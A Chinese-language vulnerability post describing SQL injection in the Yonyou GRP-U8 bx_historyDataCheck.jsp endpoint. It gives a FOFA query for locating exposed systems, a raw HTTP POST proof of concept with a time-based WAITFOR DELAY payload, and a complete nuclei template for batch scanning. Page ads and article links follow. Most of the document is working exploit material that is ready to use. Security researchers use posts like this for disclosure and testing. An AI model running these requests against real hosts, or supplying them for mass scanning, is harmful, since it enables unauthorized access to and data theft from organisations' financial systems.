用友GRP-U8 bx_historyDataCheck.jsp SQL注入漏洞
漏洞简介
用友GRP-U8 bx_historyDataCheck.jsp存在sql注入,攻击者可利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
漏洞复现
fofa语法:app="用友-GRP-U8"
页面如下:
POC:
POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Content-Length: 67
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
userName='%3bWAITFOR+DELAY+'0%3a0%3a5'--%26ysnd%3d%26historyFlag%3d
nuclei批量yaml文件
id: yonyou_GRPU8_bx_historyDataCheck_sqli
info:
name: Yonyou U8 bx_historyDataCheck - SQL Injection
author: xianke
severity: high
description: |
Yonyou U8 Grp contains a SQL injection vulnerability.
reference:
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-grp-u8-bx_historyDataChecks-sqli.yaml
- https://github.com/MD-SEC/MDPOCS/blob/main/Yongyou_Grp_U8_bx_historyDataCheck_Sql_Poc.py
metadata:
verified: true
max-request: 2
fofa-query: icon_hash="-299520369"
tags: yonyou,grp,sqli
http:
- raw:
- |
GET /login.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- |
POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
userName='%3bWAITFOR+DELAY+'0%3a0%3a5'--%26ysnd%3d%26historyFlag%3d
matchers:
- type: dsl
dsl:
- 'duration_2>=6'
- 'status_code == 200'
- 'contains(content_type_2, "text/html") && contains(body_1, "GRP-U8")'
condition: and
# digest: 4a0a00473045022100ff26707ab7b707eb63657075468f8fb5c9be2587a852c61a038cd6e74f11d80902201a654b27bab1bfb591f1d1cfd0517a439d2b61b67636eff6fac15f5091503614:922c64590222798bb761d5b6d8e72950
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么 退出登录 或 修改密码 无法使 token 失效